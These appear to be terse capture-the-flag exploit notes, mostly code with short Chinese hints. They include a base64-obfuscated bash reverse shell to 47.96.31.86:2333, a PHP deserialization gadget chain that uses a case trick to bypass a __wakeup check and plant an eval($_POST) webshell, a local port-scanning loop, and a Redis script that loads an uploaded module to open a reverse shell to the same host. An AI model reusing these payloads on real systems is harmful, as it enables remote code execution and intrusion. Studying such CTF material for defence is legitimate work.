jackjson
有个shiro
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny45Ni4zMS44Ni8yMzMzIDA+JjE=}|{base64,-d}|{bash,-i}
esay_eval
exp
<?php
class A{
public $code = "eval(\$_POST['cmd']]);";
function __call($method,$args){
eval($this->code);
}
function __wakeup(){
$this->code = "";
}
}
class B{
function __destruct(){
echo $this->a->a();
}
}
$b = new B();
$b->a=new A();
echo serialize($b);
//if(isset($_REQUEST['poc'])){
// preg_match_all('/"[BA]":(.*?):/s',$_REQUEST['poc'],$ret);
// if (isset($ret[1])) {
// foreach ($ret[1] as $i) {
// if(intval($i)!==1){
// exit("you want to bypass wakeup ? no !");
// }
// }
// unserialize($_REQUEST['poc']);
// }
//
//
//}else{
// highlight_file(__FILE__);
//}
大小写绕正则
O:1:"B":1:{s:1:"a";O:1:"a":2:{s:4:"code";s:21:"@eval($_POST["cmd"]);";}}
需要绕disable_function
.config.php.swp
\
可以发现有个redis服务,扫端口
?><?php
for($i=0;$i<65535;$i++) {
$t=stream_socket_server("tcp://0.0.0.0:".$i,$ee,$ee2);
if($ee2 === "Address already in use") {
var_dump($i);
}
}
6379
/tmp目录可以上传
<?php
function Getfile($host, $port, $link){
$fp = fsockopen($host, intval($port), $errno, $errstr, 30);
if(!$fp){
echo "$errstr (error number $errno) \n";
}else{
$out = "$link";
//$out = "GET $link HTTP/1.1\r\n";
//$out .= "HOST $host \r\n";
//$out .= "Connection: Close\r\n\r\n";
//$out .= "\r\n";
fwrite($fp, $out);
$content = '';
while(!feof($fp)){
$contents .= fgets($fp, 1024);
}
fclose($fp);
return $contents;
}
}
$poc = "AUTH you_cannot_guess_it\r\n";
$poc .= "module load /tmp/exp.so\r\nsystem.rev 47.96.31.86 2333\r\n";
$poc .= "info\r\nquit\r\n";
var_dump($poc);
var_dump(Getfile("127.0.0.1","6379",$poc));